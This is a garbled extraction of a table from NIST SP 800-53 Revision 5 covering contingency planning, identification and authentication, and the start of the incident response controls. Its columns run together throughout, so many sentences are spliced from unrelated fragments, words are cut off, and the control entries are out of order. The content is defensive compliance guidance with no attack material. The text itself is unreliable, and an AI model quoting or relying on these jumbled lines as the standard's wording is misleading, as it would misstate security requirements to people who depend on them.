processing and/or storage
storage sites
sites.with minimal or no loss of operational continuity and sustain that processing and/or storage sites defined by planning
organizations as part impact
of contingency planning may
CP-2(7) Contingency Plan | Coordinate with External Service Providers Coordinate the contingency plan with the contingency plans of external service providers to ensure t storage When the
change
sites as part
capability
depending
of an
of business continuity
organization toassociated
carry out its or mission
business analyses.
and business Primary
functions processing SA-9.
is dependent
continuity through system restoration to primary processing and/or storage sites. and/or storage sitesondefined
the circumstances
by organizations as partwith the contingency.
of contingency planning may change
CP-2(8) Contingency Plan | Identify Critical Assets Identify critical system assets supporting [Selection: all; essential] mission and business functions. Organizations depending on the maycircumstances
choose to identify criticalwith
associated assetstheascontingency.
part of criticality analysis, business continu CM-8, RA-9.
CP-3 Contingency Training a. Provide contingency training to system users consistent with assigned roles and responsibilities: Contingency training provided by organizations is linked to the assigned roles and responsibilities of organizational AT-2, AT-3, AT-4,
personnel
CP-2, CP-4,
to ensure
CP-8, IR-2,
that the
IR-4,appropriate
IR-9. content and level of detail is included in such train
CP-3(1) Contingency Training | Simulated Events 1. Within [Assignment: organization-defined time period] of assuming a contingency role or
Incorporate simulated events into contingency training to facilitate effective response by personnel The use of simulated events creates an environment for personnel to experience actual threat None.
responsibility;
in crisis situations. events, including cyber-attacks that disable websites,
CP-3(2) Contingency Training | Mechanisms Used in Training Environments Employ mechanisms used in operations to provide a more thorough and realistic contingency Operational mechanisms refer to processes that have ransomware
been established attacks that encryptan
to accomplish None.
training environment. organizational goal data onaservers,
system hurricanes thata damage ororganizational
destroy organizational facilities, or
CP-4 Contingency Plan Testing a. Test the contingency plan for the system [Assignment: organization-defined frequency] using the organizational Methods for
hardware or testingor
software contingency
failures.
that supports
plans to determine particular
the effectiveness of mission
the plans or business
and identify potenti AT-3, CP-2, CP-3, CP-8, CP-9, IR-3, IR-4, PL-2, PM-14, SR-2.
following tests to determine objective. Actual mission and business processes, systems, and/or facilities may be used to generate
CP-4(1) Contingency Plan Testing | Coordinate with Related Plans Coordinate contingency plan the effectiveness
testing of the planelements
with organizational and the readiness
responsible tofor
execute the
related plan:
plans. Plans related
simulated to contingency
events and enhance planning for organizational
the realism of simulated events systemsduring
include Business Continuity
contingency training. Plans, DIR-8, PM-8.
[Assignment: organization-defined tests].
CP-4(2) Contingency Plan Testing | Alternate Processing Site Test the contingency plan at the alternate processing site: Conditions at the alternate processing site may be significantly different than the conditions at the prCP-7.
CP-4(3) Contingency Plan Testing | Automated Testing (a)
TestTothe
familiarize
contingency contingency
plan using personnel with the
[Assignment: facility and available
organization-defined resources;
automated and
mechanisms]. Automated mechanisms facilitate thorough and effective testing of contingency plans by providing None.
more complete coverage of contingency issues, selecting more realistic test scenarios and
environments, and effectively stressing the system and supported mission and business functions.

4 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

CP-4(4) Contingency Plan Testing | Full Recovery and Reconstitution Include a full recovery and reconstitution of the system to a known state as part of contingency plan tRecovery is executing contingency plan activities to restore organizational mission and business func CP-10, SC-24.
CP-4(5) Contingency Plan Testing | Self-challenge Employ [Assignment: organization-defined mechanisms] to [Assignment: organization-defined Often, the best method of assessing system resilience is to disrupt the system in some manner. The None.
CP-10(3) System Recovery and Reconstitution | Compensating Security Controls system or system
[Withdrawn: component]
Addressed through totailoring.]
disrupt and adversely affect the system or system component. mechanisms used by the organization could disrupt system functions or system services in many
ways, including terminating or disabling critical system components, changing the configuration of
CP-6 Alternate Storage Site a. Establish an alternate storage site, including necessary agreements to permit the storage and Alternate
system storage sitesdegrading
components, are geographically distinct from
critical functionality primary
(e.g., storage
restricting sites and
network maintain or
bandwidth), duplicate CP-2, CP-7, CP-8, CP-9, CP-10, MP-4, MP-5, PE-3, SC-36, SI-13.
CP-6(1) Alternate Storage Site | Separation from Primary Site retrieval
Identify an of alternate
system backup storageinformation; and
site that is sufficiently separated from the primary storage site to reduceThreats that affect alternate storage sites are defined in organizational risk assessments and include RA-3.
CP-6(2) Alternate Storage Site | Recovery Time and Recovery Point Objectives Configure the alternate storage site to facilitate recovery operations in accordance with recovery Organizations establish recovery time and recovery point objectives as part of contingency None.
CP-6(3) Alternate Storage Site | Accessibility time andpotential
Identify recoveryaccessibility
point objectives.
problems to the alternate storage site in the event of an area-wide disrArea-wide planning. Configuration
disruptions refer of the to alternate
those types storage site includes
of disruptions thatphysical
are broad facilities and thescope
in geographic systemswith such RA-3.
supporting recovery operations that ensure accessibility and correct execution.
CP-7 Alternate Processing Site a. Establish an alternate processing site, including necessary agreements to permit the transfer and Alternate processing sites are geographically distinct from primary processing sites and provide proceCP-2, CP-6, CP-8, CP-9, CP-10, MA-6, PE-3, PE-11, PE-12, PE-17, SC-36, SI-13.
CP-7(1) Alternate Processing Site | Separation from Primary Site resumption of [Assignment:
Identify an alternate organization-defined
processing system
site that is sufficiently operations]
separated fromfor theessential
primary mission
processingandsite to Threats that affect alternate processing sites are defined in organizational assessments of risk and in RA-3.
business functions within [Assignment: organization-defined time period consistent with recovery
CP-7(2) Alternate Processing Site | Accessibility Identify
time andpotential
recoveryaccessibility problems
point objectives] whentothe
alternate
primary processing
processing sites in the event
capabilities of an area-wide disrArea-wide disruptions refer to those types of disruptions that are broad in geographic scope with s RA-3.
are unavailable;
CP-7(3) Alternate Processing Site | Priority of Service Develop alternate processing site agreements that contain priority-of-service provisions in Priority of service agreements refer to negotiated agreements with service providers that ensure None.
CP-7(4) Alternate Processing Site | Preparation for Use accordance
Prepare the with availability
alternate requirements
processing (including
site so that the site recovery
can servetime objectives).
as the operational site supporting ess that organizations
Site preparation receiveestablishing
includes priority treatment consistent
configuration withfor
settings their availability
systems at therequirements and the siCM-2, CM-6, CP-4.
alternate processing
availability of information resources for logical alternate processing and/or at the physical alternate
CP-10(5) System Recovery and Reconstitution | Failover Capability [Withdrawn: Incorporated into SI-13.] processing site. Organizations establish recovery time objectives as part of contingency planning.
CP-7(6) Alternate Processing Site | Inability to Return to Primary Site Plan and prepare for circumstances that preclude returning to the primary processing site. There may be situations that preclude an organization from returning to the primary processing site None.
CP-8 Telecommunications Services Establish alternate telecommunications services, including necessary agreements to permit the resump such as if a natural disaster
Telecommunications services (e.g.,
(forflood
data or
and a hurricane) damaged
voice) for primary and oralternate
destroyedprocessing
a facility andanditstorage
was sitCP-2, CP-6, CP-7, CP-11, SC-7.
determined that rebuilding in the same location was not prudent.
CP-8(1) Telecommunications Services | Priority of Service Provisions (a) Develop primary and alternate telecommunications service agreements that contain priority-of- Organizations consider the potential mission or business impact in situations where None.
CP-8(2) Telecommunications Services | Single Points of Failure service provisions in accordance with availability requirements (including recovery time objectives); telecommunications service providers are servicing
Obtain alternate telecommunications services to reduce the likelihood of sharing a single point of In certain circumstances, telecommunications service providers or services may share the same other organizations with similar priority of None.
and
failure with primary telecommunications services. service
physicalprovisions.
lines,affect
which Telecommunications
increases the vulnerability Service of Priority (TSP)
a single is a point.
failure FederalIt Communications
is important to have
CP-8(3) Telecommunications Services | Separation of Primary and Alternate Providers Obtain alternate telecommunications services from providers that are separated from primary Threats
Commission that telecommunications
(FCC) program that directs services are
telecommunications defined in organizational
service providers assessments of
(e.g., wireline and risk None.
service providers to and
reduce susceptibility to the same threats. provider transparency for the actual physical transmission capability for telecommunication
CP-8(4) Telecommunications Services | Provider Contingency Plan (a) Require primary alternate telecommunications service providers to have contingency plans; and include
Reviews
services.
natural disasters,
of provider contingency structural failures,
plans consider cyber
the or physical
proprietary attacks,
nature and errors
of such plans. of omission
In some or
situatioCP-3, CP-4.
(b) Review provider contingency plans to ensure that the plans meet organizational contingency commission. Organizations can reduce common susceptibilities by minimizing shared infrastructure
CP-8(5) Telecommunications Services | Alternate Telecommunication Service Testing Test alternate telecommunication services [Assignment: organization-defined frequency]. Alternate
among telecommunications
telecommunications services
service testingand
providers is arranged
achieving through
sufficientcontractual
geographic agreements
separationwith service CP-3.
requirements; and
CP-9 System Backup a. Conduct backups of user-level information contained in [Assignment: organization-defined System-level information includes system state information, operating system software, middleware,CP-2, ap CP-6, CP-10, MP-4, MP-5, SC-8, SC-12, SC-13, SI-4, SI-13.
CP-9(1) System Backup | Testing for Reliability and Integrity system components]
Test backup information [Assignment:
[Assignment: organization-defined
organization-defined frequency consistent
frequency] with
to verify recovery
media timeand Organizations need assurance that backup information can be reliably retrieved. Reliability pertains CP-4.
reliability
and recovery point objectives];
CP-9(2) System Backup | Test Restoration Using Sampling Use a sample of backup information in the restoration of selected system functions as part of contingOrganizations need assurance that system functions can be restored correctly and can support establCP-4.
CP-9(3) System Backup | Separate Storage for Critical Information Store backup copies of [Assignment: organization-defined critical system software and other security-re Separate storage for critical information applies to all critical information regardless of the type CM-2, CM-6, CM-8.
CP-2(4) Contingency Plan | Resume All Mission and Business Functions [Withdrawn: Incorporated into CP-2(3).]
CP-9(5) System Backup | Transfer to Alternate Storage Site Transfer system backup information to the alternate storage site [Assignment: organization-defined tSystem backup information can be transferred to alternate storage sites either electronically or by t CP-7, MP-3, MP-4, MP-5.
CP-9(6) System Backup | Redundant Secondary System Conduct system backup by maintaining a redundant secondary system that is not collocated with theThe p effect of system backup can be achieved by maintaining a redundant secondary system that mirrors CP-7.
CP-9(7) System Backup | Dual Authorization for Deletion or Destruction Enforce dual authorization for the deletion or destruction of [Assignment: organization-defined back Dual authorization ensures that deletion or destruction of backup information cannot occur unless two AC-3, AC-5, MP-2.
CP-9(8) System Backup | Cryptographic Protection Implement cryptographic mechanisms to prevent unauthorized disclosure and modification of [Assig The selection of cryptographic mechanisms is based on the need to protect the confidentiality and i SC-12, SC-13, SC-28.
CP-10 System Recovery and Reconstitution Provide for the recovery and reconstitution of the system to a known state within [Assignment: organiRecovery is executing contingency plan activities to restore organizational mission and business func CP-2, CP-4, CP-6, CP-7, CP-9, IR-4, SA-8, SC-24, SI-13.
CP-5 Contingency Plan Update [Withdrawn: Incorporated into CP-2.]
CP-10(2) System Recovery and Reconstitution | Transaction Recovery Implement transaction recovery for systems that are transaction-based. Transaction-based systems include database management systems and transaction processing None.
CP-7(5) Alternate Processing Site | Equivalent Information Security Safeguards Withdrawn: Incorporated into CP-7.] systems. Mechanisms supporting transaction recovery include transaction rollback and transaction
journaling.
CP-10(4) System Recovery and Reconstitution | Restore Within Time Period Provide the capability to restore system components within [Assignment: organization-defined restorRestoration of system components includes reimaging, which restores the components to known, oper CM-2, CM-6.
CP-9(4) System Backup | Protection from Unauthorized Modification [Withdrawn: Incorporated into CP-9.]
CP-10(6) System Recovery and Reconstitution | Component Protection Protect system components used for recovery and reconstitution. Protection of system recovery and reconstitution components (i.e., hardware, firmware, and softwareAC-3, AC-6, MP-2, MP-4, PE-3, PE-6.
CP-11 Alternate Communications Protocols Provide the capability to employ [Assignment: organization-defined alternative communications protoc Contingency plans and the contingency training or testing associated with those plans incorporate anCP-2, CP-8, CP-13.
CP-12 Safe Mode When [Assignment: organization-defined conditions] are detected, enter a safe mode of operation wit For systems that support critical mission and business functions—including military operations, civi CM-2, SA-8, SC-24, SI-13, SI-17.
CP-13 Alternative Security Mechanisms Employ [Assignment: organization-defined alternative or supplemental security mechanisms] for sati Use of alternative security mechanisms supports system resiliency, contingency planning, and contin CP-2, CP-11, SI-13.
IA-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Identification and authentication policy and procedures address the controls in the IA family that ar AC-1, PM-9, PS-8, SI-12.
IA-2 Identification and Authentication (organizational Users) 1. [Selection
Uniquely (one and
identify or more): Organization-level;
authenticate organizational Mission/business
users and associateprocess-level; System-level]
that unique identification with Organizations can satisfy the identification and authentication requirements by complying with the AC-2, AC-3, AC-4, AC-14, AC-17, AC-18, AU-1, AU-6, IA-4, IA-5, IA-8, MA-4, MA-5, PE-2, PL-
identification and authentication policy that: requirements in HSPD 12. Organizational users
IA-2(1) Identification and Authentication (organizational Users) | Multi-factor Authentication to Privileged A Implement multi-factor authentication for access to privileged accounts. Multi-factor authentication requires the use of include
two or moreemployeesdifferent or individuals who organizations
factors to achieve 4, SA-4,
authenticatioAC-5, SA-8.
AC-6.
consider to have an equivalent status to employees (e.g., contractors and guest researchers).
IA-2(2) Identification and Authentication (organizational Users) | Multi-factor Authentication to Non-privile Implement multi-factor authentication for access to non-privileged accounts. Multi-factor
Unique authentication
identification requires the use
and authentication of two
of users or more
applies different
to all accesses factors
othertothanachieve
thoseauthenticati
that are AC-5.
IA-2(11) Identification and Authentication (organizational Users) | Remote Access — Separate Device [Withdrawn: Incorporated into IA-2(6).]
IA-2(3) Identification and Authentication (organizational Users) | Local Access to Privileged Accounts [Withdrawn: Incorporated into IA-2(1).]
IA-2(5) Identification and Authentication (organizational Users) | Individual Authentication with Group When shared accounts or authenticators are employed, require users to be individually Individual authentication prior to shared group authentication mitigates the risk of using group None.
IA-2(6) Authentication
Identification and Authentication (organizational Users) | Access to Accounts —separate Device authenticated
Implement before granting
multi-factor access tofor
authentication the[Selection
shared accounts or resources.
(one or more): local; network; remote] access accounts
The purpose or authenticators.
of requiring a device that is separate from the system to which the user is attempting t AC-6.
IA-2(4) Identification and Authentication (organizational Users) | Local Access to Non-privileged Accounts to [Selection (one
[Withdrawn: or more):into
Incorporated privileged
IA-2(2).]accounts; non-privileged accounts] such that:
IA-2(8) Identification and Authentication (organizational Users) | Access to Accounts — Replay Resistant Implement replay-resistant authentication mechanisms for access to [Selection (one or more): Authentication processes resist replay attacks if it is impractical to achieve successful None.
IA-2(7) Identification and Authentication (organizational Users) | Network Access to Non-privileged privileged
[Withdrawn: accounts; non-privileged
Incorporated accounts].
into IA-2(6).] authentications by replaying previous authentication messages. Replay-resistant techniques include
Accounts — Separate Device protocols that use nonces or challenges such as time synchronous or cryptographic authenticators.
IA-2(10) Identification and Authentication (organizational Users) | Single Sign-on Provide a single sign-on capability for [Assignment: organization-defined system accounts and Single sign-on enables users to log in once and gain access to multiple system resources. None.
IA-2(9) Identification and Authentication (organizational Users) | Network Access to Non-privileged services].
[Withdrawn: Incorporated into IA-2(8).] Organizations consider the operational efficiencies provided by single sign-on capabilities with the
Accounts — Replay Resistant risk introduced by allowing access to multiple systems via a single authentication event. Single sign-
IA-2(12) Identification and Authentication (organizational Users) | Acceptance of PIV Credentials Accept and electronically verify Personal Identity Verification-compliant credentials. Acceptance
on can present of Personal
opportunitiesIdentity Verification
to improve (PIV)-compliant
system security, forcredentials
example byappliesproviding to organizations
the ability to None.
IA-2(13) Identification and Authentication (organizational Users) | Out-of-band Authentication Implement the following out-of-band authentication mechanisms under [Assignment: organization-def implementing logical access refers
Out-of-band authentication controltoand thephysical
use of two access control
separate systems. PIV-compliant
communication credentials
paths to identify and auth
IA-10, IA-11, SC-37.
are those credentials issued by federal agencies that conform to FIPS Publication 201 and
IA-3 Device Identification and Authentication Uniquely identify and authenticate [Assignment: organization-defined devices and/or types of devicessupporting Devices thatguidance
require unique
documents. device-to-device
The adequacy identification
and reliability andofauthentication
PIV card issuers areare
defined by type, d AC-17, AC-18, AC-19, AU-6, CA-3, CA-9, IA-4, IA-5, IA-9, IA-11, SI-4.
authorized
IA-3(1) Device Identification and Authentication | Cryptographic Bidirectional Authentication Authenticate [Assignment: organization-defined devices and/or types of devices] before establishing A [ local connection is a connection with a device that communicates without the use of a network. A nSC-8, SC-12, SC-13.
IA-3(2) Device Identification and Authentication | Cryptographic Bidirectional Network Authentication Withdrawn: Incorporated into IA-3(1).]
IA-3(3) Device Identification and Authentication | Dynamic Address Allocation (a) Where addresses are allocated dynamically, standardize dynamic address allocation lease The Dynamic Host Configuration Protocol (DHCP) is an example of a means by which clients can dynaAU-2.
IA-3(4) Device Identification and Authentication | Device Attestation information
Handle device and the lease duration
identification assigned to devices
and authentication based on in attestation
accordanceby with [Assignment:
[Assignment: organization- Device attestation refers to the identification and authentication of a device based on its configura CM-2, CM-3, CM-6.
organization-defined lease information and lease duration]; and
IA-4 Identifier Management Manage system identifiers by: Common device identifiers include Media Access Control (MAC) addresses, Internet Protocol (IP) address AC-5, IA-2, IA-3, IA-5, IA-8, IA-9, IA-12, MA-4, PE-2, PE-3, PE-4, PL-4, PM-12, PS-3, PS-4,
IA-4(1) Identifier Management | Prohibit Account Identifiers as Public Identifiers a. Receiving authorization from [Assignment: organization-defined
Prohibit the use of system account identifiers that are the same as public identifiers personnel or roles]
fortoindividual
assign anac Prohibiting account identifiers as public identifiers applies to any publicly disclosed account identifi PS-5, AT-2, SC-37.
PT-7.
individual, group, role, service, or device identifier;
IA-4(2) Identifier Management | Supervisor Authorization [Withdrawn: Incorporated into IA-12(1).]
IA-4(3) Identifier Management | Multiple Forms of Certification [Withdrawn: Incorporated into IA-12(2).]
IA-4(4) Identifier Management | Identify User Status Manage individual identifiers by uniquely identifying each individual as [Assignment: organization- Characteristics that identify the status of individuals include contractors, foreign nationals, and non- None.
IA-4(5) Identifier Management | Dynamic Management defined
Managecharacteristic identifying
individual identifiers individualinstatus].
dynamically accordance with [Assignment: organization-defined dynam organizational
In contrast to users. Identifying
conventional the status
approaches toof individuals by
identification thatthese characteristics
presume provides
static accounts for additional
preregisteredAC-16.
users, many distributed systems establish identifiers at runtime for entities that were previously unkno
information about the people with whom organizational personnel are communicating. For
IA-4(6) Identifier Management | Cross-organization Management Coordinate with the following external organizations for cross-organization management of identifierCross-organization example, it might beidentifieruseful for management
a government provides
employee the capability
to know that to identify
one of the individuals,
individuals groups,
on anrole AU-16, IA-2, IA-5.
IA-4(7) Identifier Management | In-person Registration [Withdrawn: Incorporated into IA-12(4).]
IA-4(8) Identifier Management | Pairwise Pseudonymous Identifiers Generate pairwise pseudonymous identifiers. A pairwise pseudonymous identifier is an opaque unguessable subscriber identifier generated by an ide IA-5.
IA-4(9) Identifier Management | Attribute Maintenance and Protection Maintain the attributes for each uniquely identified individual, device, or service in [Assignment: For each of the entities covered in IA-2, IA-3, IA-8, and IA-9, it is important to maintain the None.
IA-5 Authenticator Management organization-defined
Manage protected by:
system authenticators central storage]. attributes for each
Authenticators authenticated
include passwords,entity on an ongoing
cryptographic devices,basis in a central
biometrics, (protected)
certificates, store.
one-time AC-3, AC-6, CM-6, IA-2, IA-4, IA-7, IA-8, IA-9, MA-4, PE-2, PL-4, SC-12, SC-13.
IA-5(1) Authenticator Management | Password-based Authentication a.
ForVerifying, as part ofauthentication:
password-based the initial authenticator distribution, the identity of the individual, group, password
Password-based devices, and ID badges.
authentication Devicetoauthenticators
applies passwords regardless include certificates
of whether and theypasswords.
are used inInitial
single-faIA-6.
role,
(a) service, aorlist
Maintain device receiving the authenticator;
of commonly-used, expected, or compromised passwords and update the list authenticator content is the actual content of the authenticator (e.g., the initial password). In
IA-5(2) Authenticator Management | Public Key-based Authentication (a) For public key-based authentication: Public key cryptography is a valid authentication mechanism for individuals, machines, and devices. For
IA-3, SC-17.
[Assignment:
(1) organization-defined
Enforce authorized access thefrequency] and when organizational passwords are suspected to contrast, the requirements for authenticator content contain specific criteria or characteristics (e.g.,
IA-5(11) Authenticator Management | Hardware Token-based Authentication [Withdrawn:
have Incorporated
been compromised intotoIA-2(1)
directly
corresponding
and IA-2(2).] private key; and
or indirectly;
IA-5(3) Authenticator Management | In-person or Trusted External Party Registration [Withdrawn: Incorporated into IA-12(4).]
IA-5(5) Authenticator Management | Change Authenticators Prior to Delivery Require developers and installers of system components to provide unique authenticators or Changing authenticators prior to the delivery and installation of system components extends the None.
IA-5(6) Authenticator Management | Protection of Authenticators change
Protect default authenticators
authenticators prior to delivery
commensurate with the and installation.
security category of the information to which use of tFor requirement
systems that for organizations
contain multiple to change
securitydefault
categoriesauthenticators
of information uponwithout
systemreliable
installation by or log RA-2.
physical
requiring developers and/or installers to provide unique authenticators or change default
IA-5(7) Authenticator Management | No Embedded Unencrypted Static Authenticators Ensure that unencrypted static authenticators are not embedded in applications or other forms of authenticators In addition to applications, other forms prior
for system components of static storage and/or
to delivery includeinstallation.
access scripts and function
However, keys.
it typically None.
IA-5(8) Authenticator Management | Multiple System Accounts static storage.
Implement [Assignment: organization-defined security controls] to manage the risk of compromise duOrganizations When individuals exercise
have caution
accountswhen determining
on multiple systems whether
and use embedded
the sameor stored authenticators
authenticators are PS-6.
such as password
in encrypted or unencrypted form. If authenticators are used in the manner stored, then those
IA-5(9) Authenticator Management | Federated Credential Management Use the following external organizations to federate credentials: [Assignment: organization-defined eFederation representations provides organizations
are considered with the capability
unencrypted to authenticate individuals and devices when con
authenticators. AU-7, AU-16.
IA-5(10) Authenticator Management | Dynamic Credential Binding Bind identities and authenticators dynamically using the following rules: [Assignment: organization-deAuthentication requires some form of binding between an identity and the authenticator that is usedAU-16, t IA-5.
IA-5(4) Authenticator Management | Automated Support for Password Strength Determination [Withdrawn: Incorporated into IA-5(1).]
IA-5(12) Authenticator Management | Biometric Authentication Performance For biometric-based authentication, employ mechanisms that satisfy the following biometric quality Unlike password-based authentication, which provides exact matches of user-input passwords to store AC-7.
IA-5(13) Authenticator Management | Expiration of Cached Authenticators Prohibit the use of cached authenticators after [Assignment: organization-defined time period]. Cached authenticators are used to authenticate to the local machine when the network is not None.
IA-5(14) Authenticator Management | Managing Content of PKI Trust Stores For PKI-based authentication, employ an organization-wide methodology for managing the content available. If cached authentication
An organization-wide methodologyinformation
for managing is out
the of date, the
content validity
of PKI trust of the authentication
stores helps improve the None.
of PKI trust storesServices
installedAdministration-approved
across all platforms, including networks, operating systems,credential, information
browsers, General
accuracyServices may
and currencybe questionable.
of PKI-based authentication credentials across the
IA-5(15) Authenticator Management | GSA-approved Products and Services Use only General products and services for identity, Administration (GSA)-approved products and services areorganization.
products and services None.
and
and applications.
access
IA-5(16) Authenticator Management | In-person or Trusted External Party Authenticator Issuance Require thatmanagement.
the issuance of [Assignment: organization-defined types of and/or specific authenticatorthat Issuinghave been approved
authenticators throughorthe
in person by aGSA conformance
trusted program,
external party whereand
enhances applicable,
reinforces andthe posted to IA-12.
trustworth
the GSA Approved Products List. GSA provides guidance for teams to design and build functional
IA-5(17) Authenticator Management | Presentation Attack Detection for Biometric Authenticators Employ presentation attack detection mechanisms for biometric-based authentication. Biometric
and securecharacteristics
systems that comply do not constitute
with Federal secrets.
Identity,Such characteristics
Credential, can beManagement
and Access obtained by online(FICAM)web AC-7.

5 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

IA-5(18) Authenticator Management | Password Managers (a) Employ [Assignment: organization-defined password managers] to generate and manage For systems where static passwords are employed, it is often a challenge to ensure that the None.
IA-6 Authentication Feedback passwords; and of authentication information during the authentication process to protect the inf passwords
Obscure feedback Authentication are suitably
feedback complex
from systems and that doesthenot same passwords
provide are notthat
information employed
would allow on multiple
unauthorized individuals
AC-3. to compromise authentication mechanisms. For some types of systems, such as desktops or no
systems. A password manager is a solution to this problem as it automatically generates and stores
IA-7 Cryptographic Module Authentication Implement mechanisms for authentication to a cryptographic module that meet the requirements of strong Authentication
appl and different mechanismspasswords mayfor bevarious
required within aAcryptographic
accounts. potential risk module of usingto authenticate
password managersan operato
is AC-3, IA-5, SA-4, SC-12, SC-13.
IA-8 Identification and Authentication (non-organizational Users) Uniquely identify and authenticate non-organizational users or processes acting on behalf of non-orgNon-organizational users include system users other than organizational users explicitly covered by I AC-2, AC-6, AC-14, AC-17, AC-18, AU-6, IA-2, IA-4, IA-5, IA-10, IA-11, MA-4, RA-3, SA-4,
IA-8(1) Identification and Authentication (non-organizational Users) | Acceptance of PIV Credentials from O Accept and electronically verify Personal Identity Verification-compliant credentials from other federaAcceptance of Personal Identity Verification (PIV) credentials from other federal agencies applies to SC-8. PE-3.
IA-8(2) Identification and Authentication (non-organizational Users) | Acceptance of External (a) Accept only external authenticators that are NIST-compliant; and Acceptance of only NIST-compliant external authenticators applies to organizational systems that None.
IA-8(3) Authenticators
Identification and Authentication (non-organizational Users) | Use of FICAM-approved Products (b) Document and maintain
[Withdrawn: Incorporated into IA-8(2).] a list of accepted external authenticators. are accessible to the public (e.g., public-facing websites). External authenticators are issued by
nonfederal government entities and are compliant with SP 800-63B. Approved external
IA-8(4) Identification and Authentication (non-organizational Users) | Use of Defined Profiles Conform to the following profiles for identity management [Assignment: organization-defined Organizations define
authenticators meet or profiles
exceed fortheidentity
minimum management based on open identity
Federal Government-wide technical, management
security, privacy, None.
IA-8(5) Identification and Authentication (non-organizational Users) | Acceptance of PVI-I Credentials identity
Accept andmanagement
verify federated profiles].or PKI credentials that meet [Assignment: organization-defined policy]. standards. AcceptanceTo ofensure that open can
PIV-I credentials identity managementbystandards
be implemented PIV, PIV-I,are and viable,
otherrobust,commercial reliable,or external None.
sustainable,
identity and interoperable
providers. The acceptance as documented,
and verification the ofFederal Government
PIV-I-compliant assesses apply
credentials and scopes
to both the
IA-8(6) Identification and Authentication (non-organizational Users) | Disassociability Implement the following measures to disassociate user attributes or identifier assertion Federated and
standards identity solutions
technology can create increased
implementations against privacy
applicablerisks laws,
due toexecutive
the tracking orders, anddirectives,
profiling of None.
relationships among logical and physical access control systems. The acceptance and verification of PIV-I credentials
IA-9 Service Identification and Authentication Uniquely identify andindividuals,
authenticate credential service
[Assignment: providers, and relying
organization-defined parties:
system [Assignment:
services individuals.
and applicationaddress thatUsing
Services nonfederal may identifier
require
issuers
mapping tables
identification
of identity andor
cards
cryptographicinclude
authentication
that desire to
techniques
interoperate webwith to blind credential
applications
United
servicecertIA-3, IA-4, IA-5, SC-8.
using digital
States
organization-defined measures]. providers and relying parties from each other or to make identity attributes less visible to
IA-9(1) Service Identification and Authentication | Information Exchange [Withdrawn: Incorporated into IA-9.] transmitting parties can reduce these privacy risks.
IA-9(2) Service Identification and Authentication | Transmission of Decisions [Withdrawn: Incorporated into IA-9.]
IA-10 Adaptive Authentication Require individuals accessing the system to employ [Assignment: organization-defined supplemental Adversaries may compromise individual authentication mechanisms employed by organizations and subseq IA-2, IA-8.
IA-11 Re-authentication Require users to re-authenticate when [Assignment: organization-defined circumstances or situationsIn addition to the re-authentication requirements associated with device locks, organizations may requ AC-3, AC-11, IA-2, IA-3, IA-4, IA-8.
IA-12 Identity Proofing a. Identity proof users that require accounts for logical access to systems based on appropriate Identity proofing is the process of collecting, validating, and verifying a user’s identity information AC-5, IA-1, IA-2, IA-3, IA-4, IA-5, IA-6, IA-8.
IA-12(1) Identity Proofing | Supervisor Authorization identity
Require assurance level requirements
that the registration process toasreceive
specifiedan in applicable
account standards
for logical andincludes
access guidelines;
supervisor or Including supervisor or sponsor authorization as part of the registration process provides an None.
IA-12(2) Identity Proofing | Identity Evidence sponsor authorization.
Require evidence of individual identification be presented to the registration authority. additional
Identity level of scrutiny
evidence, to ensure thatevidence
such as documentary the user’s or management
a combinationchain is aware ofand
of documents thebiometrics,
account, the None.
account
reduces the is essential
likelihood to carry out organizational
of individuals using missions
fraudulent and functions,
identification and the user’s
to establish an identityprivileges are
IA-12(3) Identity Proofing | Identity Evidence Validation and Verification Require that the presented identity evidence be validated and verified through [Assignment: Validation
appropriate andfor verification
the anticipated of identity evidence
responsibilities increases
and the assurance
authorities within the that accounts
organization. and or at None.
organizational defined methods of validation least increases the work factor offor potential adversaries. The forms of acceptable evidence are
IA-12(4) Identity Proofing | In-person Validation and Verification Require that the validation and verification ofand verification].
identity evidence be conducted in person before a identifiers are being
In-person proofing
consistent with the
established
reduces
risks
the correct
likelihood user andcredentials
of fraudulent authenticators beingare beingbecause
issued bound to that
it requires None.
designated user. Validation refers toto thethe systems,
process roles,
of confirming and privileges
thatof the
associated
evidence with
is genuine theand user’s account.
authentic,actualand
IA-12(5) Identity Proofing | Address Confirmation Require thatregistration
a [Selection: authority.
registration code; notice of proofing] be delivered through an out-of-band ch the
the
physical
To make
data
presence
it more
contained difficult
in
of
the
individuals,
for adversaries
evidence is
the presentation
to
correct, pose physical
as legitimate
current, and users
related
identity
toduring
an
documents,
the identity
individual.
and
proofing
Verification pr IA-12.
face-to-face interactions with designated registration authorities.
IA-12(6) Identity Proofing | Accept Externally-proofed Identities Accept externally-proofed identities at [Assignment: organization-defined identity assurance level]. To limit unnecessary re-proofing of identities, particularly of non-PIV users, organizations accept p IA-3, IA-4, IA-5, IA-8.
IR-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Incident response policy and procedures address the controls in the IR family that are implemented wi PM-9, PS-8, SI-12.
IR-2 Incident Response Training 1. Provide
a. [Selection (one orresponse
incident more): Organization-level;
training to system Mission/business
users consistent with process-level; System-level]
assigned roles and Incident response training is associated with the assigned roles and responsibilities of organizational personnel AT-2, AT-3,toAT-4,
ensure
CP-3,
thatIR-3,
theIR-4,
appropriate
IR-8, IR-9.
content and level of detail are included in such training. For exam
incident response policy that:
responsibilities:
IR-2(1) Incident Response Training | Simulated Events Incorporate simulated events into incident response training to facilitate the required response by Organizations establish requirements for responding to incidents in incident response plans. None.
IR-2(2) Incident Response Training | Automated Training Environments personnel
Provide aninincident
crisis situations.
response training environment using [Assignment: organization-defined Incorporating
Automated simulated events
mechanisms can provide into incident response training
a more thorough and realistic helpsincident
to ensure that personnel
response training None.
automated mechanisms]. understand their
environment. Thisindividual
cananbeincident responsibilities
accomplished, forand what specific
example, by providingactions to take
more in crisiscoverage
complete situations. of a
IR-2(3) Incident Response Training | Breach Provide incident response training on how to identify and respond to a breach, including the For federal agencies, that involves personally identifiable information is considered None.
organization’s processof forthereporting incidentAresponse issues,inselecting lossmore realistic training scenarios and environments, and stressing
IR-3 Incident Response Testing Test the effectiveness incidentaresponse
breach. capability for the system [Assignment: organization-debreach. Organizations
the
breach testresults
responseorcapability. incident the response ofcapabilities
control, compromise,
to determine unauthorized
their effectiveness disclosure, andunauthorized
identify potentiCP-3, CP-4, IR-2, IR-4, IR-8, PM-14.
acquisition, a similar occurrence where a person other than an authorized user accesses or
